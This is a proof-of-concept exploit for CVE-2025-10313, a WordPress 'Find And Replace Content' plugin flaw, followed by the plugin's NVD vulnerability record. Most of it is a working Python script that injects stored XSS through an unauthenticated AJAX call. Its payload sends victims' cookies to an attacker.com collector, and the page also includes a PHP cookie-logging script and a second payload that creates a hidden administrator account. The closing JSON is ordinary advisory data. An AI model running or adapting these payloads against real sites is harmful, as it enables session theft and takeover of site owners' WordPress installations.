CVE-2025-10313

# CVE-2025-10313 PoC - Find And Replace Content Plugin Stored XSS # Exploits missing capability check in far_admin_ajax_fun() function import requests # Target WordPress site URL target_url = "http://target-wordpress-site.com" # The AJAX endpoint used by WordPress for unauthenticated AJAX calls ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Malicious JavaScript payload to be injected via stored XSS # This payload steals cookies and sends them to attacker's server xss_payload = "<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script>" # Craft the exploit request # The action parameter triggers the vulnerable far_admin_ajax_fun() function exploit_data = { "action": "far_admin_ajax_fun", "search_text": "existing_text_on_site", # Text to search for "replace_text": xss_payload, # Malicious replacement # Additional parameters may be required depending on plugin version } # Send the unauthenticated exploit request # Note: No authentication required (PR:N) and no user interaction needed (UI:N) response = requests.post(ajax_url, data=exploit_data) if response.status_code == 200: print("[+] Exploit sent successfully") print("[+] Malicious script will execute when admin visits affected pages") else: print(f"[-] Request failed with status code: {response.status_code}") # Attacker's cookie collector (steal.php) # <?php # $cookie = $_GET['cookie']; # file_put_contents("stolen_cookies.txt", $cookie . "\n", FILE_APPEND); # ?> # Alternative: Privilege escalation payload # Using XSS to create a new admin account escalation_payload = """ <script> var xhr = new XMLHttpRequest(); xhr.open("POST", "/wp-admin/user-new.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("action=createuser&_wpnonce_create-user=&user_login=hacker&[email protected]&pass1=Password123!&pass2=Password123!&role=administrator"); </script> """

{"cve": {"id": "CVE-2025-10313", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:40.373", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Find And Replace content for WordPress plugin for WordPress is vulnerable to unauthorized Stored Cross-Site Scripting and Arbitrary Content Replacement due to a missing capability check on the far_admin_ajax_fun() function in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts into pages that can make privilege escalation and malicious redirects possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/find-and-replace-content/trunk/function.php?rev=1601465", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/find-and-replace-content/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c0469ece-6f5f-4774-8094-f7f67702a775?source=cve", "source": "[email protected]"}]}}